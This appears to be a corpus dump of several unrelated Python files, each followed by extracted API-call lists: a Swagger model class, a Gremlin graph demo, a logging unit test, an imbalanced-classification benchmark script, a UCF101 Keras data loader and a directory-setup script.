self._can_create_new_application_types = can_create_new_application_types
@property
def can_delete_application_types(self):
"""Gets the can_delete_application_types of this ApplicationTypeRights. # noqa: E501
Right to delete application types. # noqa: E501
:return: The can_delete_application_types of this ApplicationTypeRights. # noqa: E501
:rtype: bool
"""
return self._can_delete_application_types
@can_delete_application_types.setter
def can_delete_application_types(self, can_delete_application_types):
"""Sets the can_delete_application_types of this ApplicationTypeRights.
Right to delete application types. # noqa: E501
:param can_delete_application_types: The can_delete_application_types of this ApplicationTypeRights. # noqa: E501
:type: bool
"""
self._can_delete_application_types = can_delete_application_types
@property
def can_edit_application_type_properties(self):
"""Gets the can_edit_application_type_properties of this ApplicationTypeRights. # noqa: E501
Right to edit application type properties. # noqa: E501
:return: The can_edit_application_type_properties of this ApplicationTypeRights. # noqa: E501
:rtype: bool
"""
return self._can_edit_application_type_properties
@can_edit_application_type_properties.setter
def can_edit_application_type_properties(self, can_edit_application_type_properties):
"""Sets the can_edit_application_type_properties of this ApplicationTypeRights.
Right to edit application type properties. # noqa: E501
:param can_edit_application_type_properties: The can_edit_application_type_properties of this ApplicationTypeRights. # noqa: E501
:type: bool
"""
self._can_edit_application_type_properties = can_edit_application_type_properties
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ApplicationTypeRights, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ApplicationTypeRights):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"six.iteritems"
]
| [((5314, 5347), 'six.iteritems', 'six.iteritems', (['self.swagger_types'], {}), '(self.swagger_types)\n', (5327, 5347), False, 'import six\n')] |
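A short illustrative sketch of using the generated model above: construct it via keyword arguments and serialise it with to_dict() (expected output shown as a comment).
# Illustrative only: exercising the generated ApplicationTypeRights model.
rights = ApplicationTypeRights(can_create_new_application_types=True,
                              can_delete_application_types=False,
                              can_edit_application_type_properties=True)
as_dict = rights.to_dict()
# {'can_create_new_application_types': True,
#  'can_delete_application_types': False,
#  'can_edit_application_type_properties': True}
print(rights)   # __repr__ pretty-prints the same dict via pprint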
from __future__ import print_function # Python 2/3 compatibility
from gremlin_python import statics
from gremlin_python.structure.graph import Graph
from gremlin_python.process.graph_traversal import __
from gremlin_python.process.strategies import *
from gremlin_python.driver.driver_remote_connection import DriverRemoteConnection
#initializing the graph object
graph = Graph()
#creating connection with the remote
remoteConn = DriverRemoteConnection('wss://<endpoint>:8182/gremlin','g')
g = graph.traversal().withRemote(remoteConn)  # reuse the connection opened above so close() below releases it
print('Connection created.')
#clearing out all the vertices to start fresh
g.V().drop().iterate()
print('Deleting everything and starting clean.')
#Adding some vertices (nodes)
gerald = g.addV('person').property('age','81').property('first_name','Gerald').property('stays_in','Portland').next()
edith = g.addV('person').property('age','78').property('first_name','Edith').property('stays_in','Portland').next()
shane = g.addV('person').property('age','52').property('first_name','Shane').property('stays_in','Seattle').next()
mary = g.addV('person').property('age','50').property('first_name','Mary').property('stays_in','Seattle').next()
betty = g.addV('person').property('age','19').property('first_name','Betty').property('stays_in','Chicago').next()
print('Added some vertices (nodes).')
#Adding relationships (edges)
edge = g.V().has('first_name', 'Gerald').addE('husband_of').to(g.V().has('first_name', 'Edith')).property('married_since','1947').next()
edge = g.V().has('first_name', 'Edith').addE('wife_of').to(g.V().has('first_name', 'Gerald')).property('married_since','1947').next()
edge = g.V().has('first_name', 'Shane').addE('son_of').to(g.V().has('first_name', 'Gerald')).property('known_since','1964').next()
edge = g.V().has('first_name', 'Gerald').addE('father_of').to(g.V().has('first_name', 'Shane')).property('known_since','1964').next()
edge = g.V().has('first_name', 'Shane').addE('son_of').to(g.V().has('first_name', 'Edith')).property('known_since','1964').next()
edge = g.V().has('first_name', 'Edith').addE('mother_of').to(g.V().has('first_name', 'Shane')).property('known_since','1964').next()
edge = g.V().has('first_name', 'Shane').addE('husband_of').to(g.V().has('first_name', 'Mary')).property('known_since','1989').next()
edge = g.V().has('first_name', 'Mary').addE('wife_of').to(g.V().has('first_name', 'Shane')).property('known_since','1989').next()
edge = g.V().has('first_name', 'Shane').addE('father_of').to(g.V().has('first_name', 'Betty')).property('known_since','1991').next()
edge = g.V().has('first_name', 'Betty').addE('daughter_of').to(g.V().has('first_name', 'Shane')).property('known_since','1991').next()
edge = g.V().has('first_name', 'Mary').addE('mother_of').to(g.V().has('first_name', 'Betty')).property('known_since','1991').next()
edge = g.V().has('first_name', 'Betty').addE('daughter_of').to(g.V().has('first_name', 'Mary')).property('known_since','1991').next()
#print out all the node's first names
print('\n Printing first name from all nodes:')
print(g.V().first_name.toList())
#print out all the properties of person whose's first name is Shane
print('\n Printing all properties of person whose first name is Shane:')
print(g.V().has('person','first_name','Shane').valueMap().next())
#traversing the graph starting with Betty to then Shane to then Edith
print('\n Finding Betty and then looking up her parents:')
print(g.V().has('first_name', 'Betty').out('daughter_of').out('son_of').valueMap().toList())
#Print out all the nodes
print('\n Printing out all the nodes:')
people = g.V().valueMap().toList()
print(people)
#Print out all the connections (edges)
print('\n Print out all the connections (edges):')
connections = g.E().valueMap().toList()
print(connections)
#Closing the connection
remoteConn.close()
print('Connection closed!') | [
"gremlin_python.structure.graph.Graph",
"gremlin_python.driver.driver_remote_connection.DriverRemoteConnection"
]
| [((376, 383), 'gremlin_python.structure.graph.Graph', 'Graph', ([], {}), '()\n', (381, 383), False, 'from gremlin_python.structure.graph import Graph\n'), ((435, 495), 'gremlin_python.driver.driver_remote_connection.DriverRemoteConnection', 'DriverRemoteConnection', (['"""wss://<endpoint>:8182/gremlin"""', '"""g"""'], {}), "('wss://<endpoint>:8182/gremlin', 'g')\n", (457, 495), False, 'from gremlin_python.driver.driver_remote_connection import DriverRemoteConnection\n'), ((528, 588), 'gremlin_python.driver.driver_remote_connection.DriverRemoteConnection', 'DriverRemoteConnection', (['"""wss://<endpoint>:8182/gremlin"""', '"""g"""'], {}), "('wss://<endpoint>:8182/gremlin', 'g')\n", (550, 588), False, 'from gremlin_python.driver.driver_remote_connection import DriverRemoteConnection\n')] |
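Two further traversals in the same style as the script above (illustrative; they assume the g traversal source and open connection created there):
# Illustrative only: extra traversals against the sample family graph above.
city_counts = g.V().hasLabel('person').groupCount().by('stays_in').next()
# e.g. {'Portland': 2, 'Seattle': 2, 'Chicago': 1}
bettys_parents = (g.V().has('first_name', 'Betty')
                  .out('daughter_of').values('first_name').toList())
# ['Shane', 'Mary']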
#!/usr/bin/env python
# Copyright 2015 The Swarming Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0 that
# can be found in the LICENSE file.
import logging
import os
import subprocess
import sys
import tempfile
import shutil
import unittest
import re
THIS_FILE = os.path.abspath(__file__)
sys.path.insert(0, os.path.dirname(os.path.dirname(THIS_FILE)))
from utils import logging_utils
# PID YYYY-MM-DD HH:MM:SS.MMM
_LOG_HEADER = r'^%d \d\d\d\d-\d\d-\d\d \d\d:\d\d:\d\d\.\d\d\d' % os.getpid()
_LOG_HEADER_PID = r'^\d+ \d\d\d\d-\d\d-\d\d \d\d:\d\d:\d\d\.\d\d\d'
_PHASE = 'LOGGING_UTILS_TESTS_PHASE'
def call(phase, cwd):
"""Calls itself back."""
env = os.environ.copy()
env[_PHASE] = phase
return subprocess.call([sys.executable, '-u', THIS_FILE], env=env, cwd=cwd)
class Test(unittest.TestCase):
def setUp(self):
super(Test, self).setUp()
self.tmp = tempfile.mkdtemp(prefix='logging_utils')
def tearDown(self):
try:
shutil.rmtree(self.tmp)
finally:
super(Test, self).tearDown()
def test_capture(self):
root = logging.RootLogger(logging.DEBUG)
with logging_utils.CaptureLogs('foo', root) as log:
root.debug('foo')
result = log.read()
expected = _LOG_HEADER + ': DEBUG foo\n$'
if sys.platform == 'win32':
expected = expected.replace('\n', '\r\n')
self.assertTrue(re.match(expected, result), (expected, result))
def test_prepare_logging(self):
root = logging.RootLogger(logging.DEBUG)
filepath = os.path.join(self.tmp, 'test.log')
logging_utils.prepare_logging(filepath, root)
root.debug('foo')
with open(filepath, 'rb') as f:
result = f.read()
# It'd be nice to figure out a way to ensure it's properly in UTC but it's
# tricky to do reliably.
expected = _LOG_HEADER + ' D: foo\n$'
self.assertTrue(re.match(expected, result), (expected, result))
def test_rotating(self):
# Create a rotating log. Create a subprocess then delete the file. Make sure
# nothing blows up.
# Everything is done in a child process because the called functions mutate
# the global state.
self.assertEqual(0, call('test_rotating_phase_1', cwd=self.tmp))
self.assertEqual({'shared.1.log'}, set(os.listdir(self.tmp)))
with open(os.path.join(self.tmp, 'shared.1.log'), 'rb') as f:
lines = f.read().splitlines()
expected = [
r' I: Parent1',
r' I: Child1',
r' I: Child2',
r' I: Parent2',
]
for e, l in zip(expected, lines):
ex = _LOG_HEADER_PID + e + '$'
self.assertTrue(re.match(ex, l), (ex, l))
self.assertEqual(len(expected), len(lines))
def test_rotating_phase_1():
logging_utils.prepare_logging('shared.log')
logging.info('Parent1')
r = call('test_rotating_phase_2', None)
logging.info('Parent2')
return r
def test_rotating_phase_2():
# Simulate rotating the log.
logging_utils.prepare_logging('shared.log')
logging.info('Child1')
os.rename('shared.log', 'shared.1.log')
logging.info('Child2')
return 0
def main():
phase = os.environ.get(_PHASE)
if phase:
return getattr(sys.modules[__name__], phase)()
verbose = '-v' in sys.argv
logging.basicConfig(level=logging.DEBUG if verbose else logging.ERROR)
unittest.main()
if __name__ == '__main__':
sys.exit(main())
| [
"logging.basicConfig",
"os.listdir",
"os.rename",
"os.environ.get",
"unittest.main",
"os.environ.copy",
"os.path.join",
"utils.logging_utils.CaptureLogs",
"os.path.dirname",
"utils.logging_utils.prepare_logging",
"re.match",
"tempfile.mkdtemp",
"subprocess.call",
"os.getpid",
"shutil.rmtree",
"os.path.abspath",
"logging.info",
"logging.RootLogger"
]
| [((323, 348), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (338, 348), False, 'import os\n'), ((543, 554), 'os.getpid', 'os.getpid', ([], {}), '()\n', (552, 554), False, 'import os\n'), ((721, 738), 'os.environ.copy', 'os.environ.copy', ([], {}), '()\n', (736, 738), False, 'import os\n'), ((770, 838), 'subprocess.call', 'subprocess.call', (["[sys.executable, '-u', THIS_FILE]"], {'env': 'env', 'cwd': 'cwd'}), "([sys.executable, '-u', THIS_FILE], env=env, cwd=cwd)\n", (785, 838), False, 'import subprocess\n'), ((2726, 2769), 'utils.logging_utils.prepare_logging', 'logging_utils.prepare_logging', (['"""shared.log"""'], {}), "('shared.log')\n", (2755, 2769), False, 'from utils import logging_utils\n'), ((2772, 2795), 'logging.info', 'logging.info', (['"""Parent1"""'], {}), "('Parent1')\n", (2784, 2795), False, 'import logging\n'), ((2840, 2863), 'logging.info', 'logging.info', (['"""Parent2"""'], {}), "('Parent2')\n", (2852, 2863), False, 'import logging\n'), ((2939, 2982), 'utils.logging_utils.prepare_logging', 'logging_utils.prepare_logging', (['"""shared.log"""'], {}), "('shared.log')\n", (2968, 2982), False, 'from utils import logging_utils\n'), ((2985, 3007), 'logging.info', 'logging.info', (['"""Child1"""'], {}), "('Child1')\n", (2997, 3007), False, 'import logging\n'), ((3010, 3049), 'os.rename', 'os.rename', (['"""shared.log"""', '"""shared.1.log"""'], {}), "('shared.log', 'shared.1.log')\n", (3019, 3049), False, 'import os\n'), ((3052, 3074), 'logging.info', 'logging.info', (['"""Child2"""'], {}), "('Child2')\n", (3064, 3074), False, 'import logging\n'), ((3110, 3132), 'os.environ.get', 'os.environ.get', (['_PHASE'], {}), '(_PHASE)\n', (3124, 3132), False, 'import os\n'), ((3227, 3297), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': '(logging.DEBUG if verbose else logging.ERROR)'}), '(level=logging.DEBUG if verbose else logging.ERROR)\n', (3246, 3297), False, 'import logging\n'), ((3300, 3315), 'unittest.main', 'unittest.main', ([], {}), '()\n', (3313, 3315), False, 'import unittest\n'), ((384, 410), 'os.path.dirname', 'os.path.dirname', (['THIS_FILE'], {}), '(THIS_FILE)\n', (399, 410), False, 'import os\n'), ((936, 976), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {'prefix': '"""logging_utils"""'}), "(prefix='logging_utils')\n", (952, 976), False, 'import tempfile\n'), ((1125, 1158), 'logging.RootLogger', 'logging.RootLogger', (['logging.DEBUG'], {}), '(logging.DEBUG)\n', (1143, 1158), False, 'import logging\n'), ((1505, 1538), 'logging.RootLogger', 'logging.RootLogger', (['logging.DEBUG'], {}), '(logging.DEBUG)\n', (1523, 1538), False, 'import logging\n'), ((1554, 1588), 'os.path.join', 'os.path.join', (['self.tmp', '"""test.log"""'], {}), "(self.tmp, 'test.log')\n", (1566, 1588), False, 'import os\n'), ((1593, 1638), 'utils.logging_utils.prepare_logging', 'logging_utils.prepare_logging', (['filepath', 'root'], {}), '(filepath, root)\n', (1622, 1638), False, 'from utils import logging_utils\n'), ((1015, 1038), 'shutil.rmtree', 'shutil.rmtree', (['self.tmp'], {}), '(self.tmp)\n', (1028, 1038), False, 'import shutil\n'), ((1168, 1206), 'utils.logging_utils.CaptureLogs', 'logging_utils.CaptureLogs', (['"""foo"""', 'root'], {}), "('foo', root)\n", (1193, 1206), False, 'from utils import logging_utils\n'), ((1411, 1437), 're.match', 're.match', (['expected', 'result'], {}), '(expected, result)\n', (1419, 1437), False, 'import re\n'), ((1891, 1917), 're.match', 're.match', (['expected', 'result'], {}), '(expected, result)\n', (1899, 1917), 
False, 'import re\n'), ((2288, 2308), 'os.listdir', 'os.listdir', (['self.tmp'], {}), '(self.tmp)\n', (2298, 2308), False, 'import os\n'), ((2325, 2363), 'os.path.join', 'os.path.join', (['self.tmp', '"""shared.1.log"""'], {}), "(self.tmp, 'shared.1.log')\n", (2337, 2363), False, 'import os\n'), ((2619, 2634), 're.match', 're.match', (['ex', 'l'], {}), '(ex, l)\n', (2627, 2634), False, 'import re\n')] |
from featur_selection import df,race,occupation,workclass,country
import pandas as pd
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import cross_val_score,KFold
from sklearn.linear_model import LogisticRegression
from imblearn.pipeline import Pipeline
from sklearn.compose import ColumnTransformer
from imblearn.combine import SMOTETomek
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier,AdaBoostClassifier
from sklearn.neighbors import KNeighborsClassifier
from catboost import CatBoostClassifier
from xgboost import XGBClassifier
from sklearn.svm import SVC
from matplotlib import pyplot as plt
import seaborn as sns
df1=df.copy()
salary=df1['salary'].reset_index(drop=True)
df1=df1.drop(['salary'],axis=1)
def concat_dataframes(data):
dataframe = pd.concat([data, workclass.iloc[data.index, :], race.iloc[data.index , :], occupation.iloc[data.index, :], country.iloc[data.index, :]], axis = 1)
dataframe = dataframe.dropna()
dataframe = dataframe.reset_index(drop=True)
return dataframe
df1= concat_dataframes(df1)
features=['age_logarthmic','hours_per_week']
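# standard-scale only the numeric columns listed above; the one-hot encoded
# workclass/race/occupation/country columns pass through unchanged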
scaler = ColumnTransformer(transformers = [('scale_num_features', StandardScaler(), features)], remainder='passthrough')
models = [LogisticRegression(), SVC(), AdaBoostClassifier(), RandomForestClassifier(), XGBClassifier(),DecisionTreeClassifier(), KNeighborsClassifier(), CatBoostClassifier()]
model_labels = ['LogisticReg.','SVC','AdaBoost','RandomForest','Xgboost','DecisionTree','KNN', 'CatBoost']
mean_validation_f1_scores = []
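# each model is evaluated inside an imblearn Pipeline so that scaling and
# SMOTETomek resampling are re-fit on the training folds of every CV split,
# keeping the validation folds free of resampling leakage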
for model in models:
data_pipeline = Pipeline(steps = [
('scaler', scaler),
('resample', SMOTETomek()),
('model', model)
])
mean_validation_f1 = float(cross_val_score(data_pipeline, df1, salary, cv=KFold(n_splits=10), scoring='f1',n_jobs=-1).mean())
mean_validation_f1_scores.append(mean_validation_f1)
print(mean_validation_f1_scores)
fig, axes = plt.subplots(nrows = 2, ncols = 1, figsize = (15,8))
sns.set_style('dark')
sns.barplot(y = model_labels ,x = mean_validation_f1_scores, ax=axes[0])
axes[0].grid(True, color='k')
sns.set_style('whitegrid')
sns.lineplot(x = model_labels, y = mean_validation_f1_scores, ax=axes[1])
axes[1].grid(True, color='k')
fig.show() | [
"sklearn.svm.SVC",
"sklearn.ensemble.AdaBoostClassifier",
"sklearn.tree.DecisionTreeClassifier",
"sklearn.neighbors.KNeighborsClassifier",
"sklearn.ensemble.RandomForestClassifier",
"sklearn.linear_model.LogisticRegression",
"seaborn.set_style",
"seaborn.lineplot",
"sklearn.preprocessing.StandardScaler",
"imblearn.combine.SMOTETomek",
"catboost.CatBoostClassifier",
"seaborn.barplot",
"sklearn.model_selection.KFold",
"pandas.concat",
"matplotlib.pyplot.subplots",
"xgboost.XGBClassifier",
"featur_selection.df.copy"
]
| [((706, 715), 'featur_selection.df.copy', 'df.copy', ([], {}), '()\n', (713, 715), False, 'from featur_selection import df, race, occupation, workclass, country\n'), ((2143, 2190), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': '(2)', 'ncols': '(1)', 'figsize': '(15, 8)'}), '(nrows=2, ncols=1, figsize=(15, 8))\n', (2155, 2190), True, 'from matplotlib import pyplot as plt\n'), ((2197, 2218), 'seaborn.set_style', 'sns.set_style', (['"""dark"""'], {}), "('dark')\n", (2210, 2218), True, 'import seaborn as sns\n'), ((2219, 2287), 'seaborn.barplot', 'sns.barplot', ([], {'y': 'model_labels', 'x': 'mean_validation_f1_scores', 'ax': 'axes[0]'}), '(y=model_labels, x=mean_validation_f1_scores, ax=axes[0])\n', (2230, 2287), True, 'import seaborn as sns\n'), ((2323, 2349), 'seaborn.set_style', 'sns.set_style', (['"""whitegrid"""'], {}), "('whitegrid')\n", (2336, 2349), True, 'import seaborn as sns\n'), ((2350, 2407), 'seaborn.lineplot', 'sns.lineplot', ([], {'x': 'model_labels', 'y': 'mean_validation_f1_scores'}), '(x=model_labels, y=mean_validation_f1_scores)\n', (2362, 2407), True, 'import seaborn as sns\n'), ((837, 984), 'pandas.concat', 'pd.concat', (['[data, workclass.iloc[data.index, :], race.iloc[data.index, :], occupation.\n iloc[data.index, :], country.iloc[data.index, :]]'], {'axis': '(1)'}), '([data, workclass.iloc[data.index, :], race.iloc[data.index, :],\n occupation.iloc[data.index, :], country.iloc[data.index, :]], axis=1)\n', (846, 984), True, 'import pandas as pd\n'), ((1374, 1394), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ([], {}), '()\n', (1392, 1394), False, 'from sklearn.linear_model import LogisticRegression\n'), ((1396, 1401), 'sklearn.svm.SVC', 'SVC', ([], {}), '()\n', (1399, 1401), False, 'from sklearn.svm import SVC\n'), ((1403, 1423), 'sklearn.ensemble.AdaBoostClassifier', 'AdaBoostClassifier', ([], {}), '()\n', (1421, 1423), False, 'from sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier\n'), ((1425, 1449), 'sklearn.ensemble.RandomForestClassifier', 'RandomForestClassifier', ([], {}), '()\n', (1447, 1449), False, 'from sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier\n'), ((1451, 1466), 'xgboost.XGBClassifier', 'XGBClassifier', ([], {}), '()\n', (1464, 1466), False, 'from xgboost import XGBClassifier\n'), ((1467, 1491), 'sklearn.tree.DecisionTreeClassifier', 'DecisionTreeClassifier', ([], {}), '()\n', (1489, 1491), False, 'from sklearn.tree import DecisionTreeClassifier\n'), ((1493, 1515), 'sklearn.neighbors.KNeighborsClassifier', 'KNeighborsClassifier', ([], {}), '()\n', (1513, 1515), False, 'from sklearn.neighbors import KNeighborsClassifier\n'), ((1517, 1537), 'catboost.CatBoostClassifier', 'CatBoostClassifier', ([], {}), '()\n', (1535, 1537), False, 'from catboost import CatBoostClassifier\n'), ((1308, 1324), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (1322, 1324), False, 'from sklearn.preprocessing import StandardScaler\n'), ((1842, 1854), 'imblearn.combine.SMOTETomek', 'SMOTETomek', ([], {}), '()\n', (1852, 1854), False, 'from imblearn.combine import SMOTETomek\n'), ((1991, 2009), 'sklearn.model_selection.KFold', 'KFold', ([], {'n_splits': '(10)'}), '(n_splits=10)\n', (1996, 2009), False, 'from sklearn.model_selection import cross_val_score, KFold\n')] |
"""
********************************
* Created by mohammed-alaa *
********************************
Spatial DataLoader implementing the Keras Sequence API (defines how to load a single item).
It loads batches of images; each iteration returns [batch_size, height, width, 3] ndarrays.
"""
import copy
import random
import cv2
import numpy as np
import tensorflow.keras as keras
from .UCF_splitting_kernel import *
from .helpers import get_training_augmenter, get_validation_augmenter
class SpatialSequence(keras.utils.Sequence):
def __init__(self, data_to_load, data_root_path, batch_size, is_training, augmenter):
"""get data structure to load data"""
# list of (video names,frame/max_frame,label)
self.data_to_load = copy.deepcopy(data_to_load)
self.batch_size = batch_size
self.is_training = is_training
self.augmenter = copy.deepcopy(augmenter)
self.data_root_path = data_root_path
self.video_names, self.frames, self.labels = [list(one_of_three_tuples) for one_of_three_tuples in zip(*self.data_to_load)] # three lists
def __len__(self):
"""Denotes the number of batches per epoch"""
return (len(self.video_names) + self.batch_size - 1) // self.batch_size # ceiling div
def get_actual_length(self):
"""Denotes the total number of samples"""
return len(self.video_names)
def __getitem__(self, batch_start):
"""Gets one batch"""
batch_video_names = self.video_names[batch_start * self.batch_size:(batch_start + 1) * self.batch_size]
batch_frames = self.frames[batch_start * self.batch_size:(batch_start + 1) * self.batch_size]
batch_y = np.array(self.labels[batch_start * self.batch_size:(batch_start + 1) * self.batch_size])
batch_x = [] # could be less or equal batch size
#
for vid_id, _ in enumerate(batch_y):
if self.is_training: # max frame is given
frame_id = random.randint(1, batch_frames[vid_id]) # random frame (one based)
else:
frame_id = batch_frames[vid_id] # just as selected
batch_x.append(
cv2.cvtColor(cv2.imread(os.path.join(self.data_root_path, "v_" + batch_video_names[vid_id], 'frame{}'.format(str(frame_id).zfill(6)) + '.jpg')), cv2.COLOR_BGR2RGB)
)
if self.is_training:
return np.array(self.augmenter.augment_images(batch_x), dtype=np.float32) / 255.0, batch_y
else:
# no label needed since (test_video_to_label mapping) (dictionary of name to label) is returned
return batch_video_names, np.array(self.augmenter.augment_images(batch_x), dtype=np.float32) / 255.0
def shuffle_and_reset(self):
"""
new data for the next epoch
"""
random.shuffle(self.data_to_load)
self.video_names, self.frames, self.labels = [list(one_of_three_tuples) for one_of_three_tuples in zip(*self.data_to_load)] # shuffle all
class SpatialDataLoader:
def __init__(self, batch_size, testing_samples_per_video, width, height, log_stream=open("/tmp/null.log", "w"), augmenter_level=1, data_root_path='./jpegs_256/', ucf_list_path='./UCF_list/', ucf_split='01'):
"""
get the mapping and initialize the augmenter
"""
self.batch_size = batch_size
self.width, self.height = width, height
self.data_root_path = data_root_path
self.testing_samples_per_video = testing_samples_per_video
self.log_stream = log_stream
# split the training and testing videos
data_util_ = DataUtil(path=ucf_list_path, split=ucf_split)
self.train_video_to_label, self.test_video_to_label = data_util_.get_train_test_video_to_label_mapping() # name without v_ or .avi and small s .. name to numeric label starts at 0
# get video frames
self.video_frame_count = data_util_.get_video_frame_count() # name without v_ or .avi and small s
self.augmenter_level = augmenter_level
def run(self):
"""
get the data structure for training and validation
"""
train_loader = self.get_training_loader()
val_loader = self.get_testing_loader()
return train_loader, val_loader, self.test_video_to_label
def get_training_data_structure(self):
"""
get the data structure for training
"""
training_data_structure = [] # list of (video names,frame/max_frame,label)
for video_name in self.train_video_to_label: # sample from the whole video frames
training_data_structure.append((video_name, self.video_frame_count[video_name], self.train_video_to_label[video_name]))
return training_data_structure
def get_testing_data_structure(self):
"""
get the data structure for validation
"""
test_data_structure = [] # list of (video names,frame/max_frame,label)
for video_name in self.test_video_to_label:
nb_frame = self.video_frame_count[video_name]
interval = nb_frame // self.testing_samples_per_video
if interval == 0: # for videos shorter than self.testing_samples_per_video
interval = 1
# range is exclusive add one to be inclusive
# 1 > self.testing_samples_per_video * interval
for frame_idx in range(1, min(self.testing_samples_per_video * interval, nb_frame) + 1, interval):
test_data_structure.append((video_name, frame_idx, self.test_video_to_label[video_name]))
return test_data_structure
def get_training_loader(self):
"""
an instance of sequence loader for spatial model for parallel dataloading using keras sequence
"""
loader = SpatialSequence(data_to_load=self.get_training_data_structure(),
data_root_path=self.data_root_path,
batch_size=self.batch_size,
is_training=True,
augmenter=get_training_augmenter(height=self.height, width=self.width, augmenter_level=self.augmenter_level),
)
print('==> Training data :', len(loader.data_to_load), 'videos', file=self.log_stream)
print('==> Training data :', len(loader.data_to_load), 'videos')
return loader
def get_testing_loader(self):
"""
an instance of sequence loader for spatial model for parallel dataloading using keras sequence
"""
loader = SpatialSequence(data_to_load=self.get_testing_data_structure(),
data_root_path=self.data_root_path,
batch_size=self.batch_size,
is_training=False,
augmenter=get_validation_augmenter(height=self.height, width=self.width),
)
print('==> Validation data :', len(loader.data_to_load), 'frames', file=self.log_stream)
print('==> Validation data :', len(loader.data_to_load), 'frames')
return loader
if __name__ == '__main__':
    data_loader = SpatialDataLoader(batch_size=64,  # data_root_path="data",
                                      ucf_split='01',
                                      testing_samples_per_video=19, width=224, height=224)
train_loader, test_loader, test_video_level_label = data_loader.run()
print(len(train_loader))
print(len(test_loader))
print(train_loader.get_actual_length())
print(test_loader.get_actual_length())
    print(train_loader[0][0].shape, train_loader[0][1].shape)
# import tqdm
# progress = tqdm.tqdm(train_loader.get_epoch_generator(), total=len(train_loader))
# for (sampled_frame, label) in progress:
# pass
import matplotlib.pyplot as plt
# preview raw data
def preview(data, labels):
# 3 channels
fig, axeslist = plt.subplots(ncols=8, nrows=8, figsize=(10, 10))
for i, sample in enumerate(data):
axeslist.ravel()[i].imshow(data[i])
axeslist.ravel()[i].set_title(labels[i])
axeslist.ravel()[i].set_axis_off()
plt.subplots_adjust(wspace=.4, hspace=.4)
print("train sample")
    for batch_index in range(len(train_loader)):
        batch_x, batch_y = train_loader[batch_index]
        print(batch_x.shape, batch_y.shape)
        print(batch_y)
        preview(batch_x, batch_y)
        break
    print("test sample")  # same names will appear testing_samples_per_video times with no shuffling
    for batch_index in range(len(test_loader)):
        batch_names, batch_x = test_loader[batch_index]
        batch_y = np.array([test_video_level_label[name] for name in batch_names])
        print(batch_x.shape, batch_y.shape)
        print(batch_names, batch_y)
        preview(batch_x, batch_y)
        break
| [
"random.randint",
"random.shuffle",
"numpy.array",
"copy.deepcopy",
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.subplots_adjust"
]
| [((760, 787), 'copy.deepcopy', 'copy.deepcopy', (['data_to_load'], {}), '(data_to_load)\n', (773, 787), False, 'import copy\n'), ((890, 914), 'copy.deepcopy', 'copy.deepcopy', (['augmenter'], {}), '(augmenter)\n', (903, 914), False, 'import copy\n'), ((1705, 1798), 'numpy.array', 'np.array', (['self.labels[batch_start * self.batch_size:(batch_start + 1) * self.batch_size]'], {}), '(self.labels[batch_start * self.batch_size:(batch_start + 1) * self\n .batch_size])\n', (1713, 1798), True, 'import numpy as np\n'), ((2837, 2870), 'random.shuffle', 'random.shuffle', (['self.data_to_load'], {}), '(self.data_to_load)\n', (2851, 2870), False, 'import random\n'), ((8155, 8203), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'ncols': '(8)', 'nrows': '(8)', 'figsize': '(10, 10)'}), '(ncols=8, nrows=8, figsize=(10, 10))\n', (8167, 8203), True, 'import matplotlib.pyplot as plt\n'), ((8404, 8447), 'matplotlib.pyplot.subplots_adjust', 'plt.subplots_adjust', ([], {'wspace': '(0.4)', 'hspace': '(0.4)'}), '(wspace=0.4, hspace=0.4)\n', (8423, 8447), True, 'import matplotlib.pyplot as plt\n'), ((1990, 2029), 'random.randint', 'random.randint', (['(1)', 'batch_frames[vid_id]'], {}), '(1, batch_frames[vid_id])\n', (2004, 2029), False, 'import random\n')] |
import os
dirs = [
'./PANDORA_files', './PANDORA_files/data', './PANDORA_files/data/csv_pkl_files',
'./PANDORA_files/data/csv_pkl_files/mhcseqs', './PANDORA_files/data/PDBs',
'./PANDORA_files/data/PDBs/pMHCI', './PANDORA_files/data/PDBs/pMHCII',
'./PANDORA_files/data/PDBs/Bad', './PANDORA_files/data/PDBs/Bad/pMHCI',
'./PANDORA_files/data/PDBs/Bad/pMHCII', './PANDORA_files/data/PDBs/IMGT_retrieved',
'./PANDORA_files/data/outputs',
'./test/test_data/PDBs/Bad','./test/test_data/PDBs/Bad/pMHCI',
'./test/test_data/PDBs/Bad/pMHCII', './test/test_data/csv_pkl_files'
]
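# create the directories in order (parents before children); os.mkdir raises
# OSError for directories that already exist, which is reported and skipped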
for D in dirs:
try:
os.mkdir(D)
except OSError:
print('Could not make directory: ' + D)
# Install dependencies
# os.popen("alias KEY_MODELLER='XXXX'").read()
# os.popen("conda install -y -c salilab modeller").read()
# os.popen("conda install -y -c bioconda muscle").read()
# os.popen("pip install -e ./").read()
| [
"os.mkdir"
]
| [((675, 686), 'os.mkdir', 'os.mkdir', (['D'], {}), '(D)\n', (683, 686), False, 'import os\n')] |
import pickle
import warnings
import collections.abc
from math import isnan
from statistics import mean, median, stdev, mode
from abc import abstractmethod, ABC
from numbers import Number
from collections import defaultdict
from itertools import islice, chain
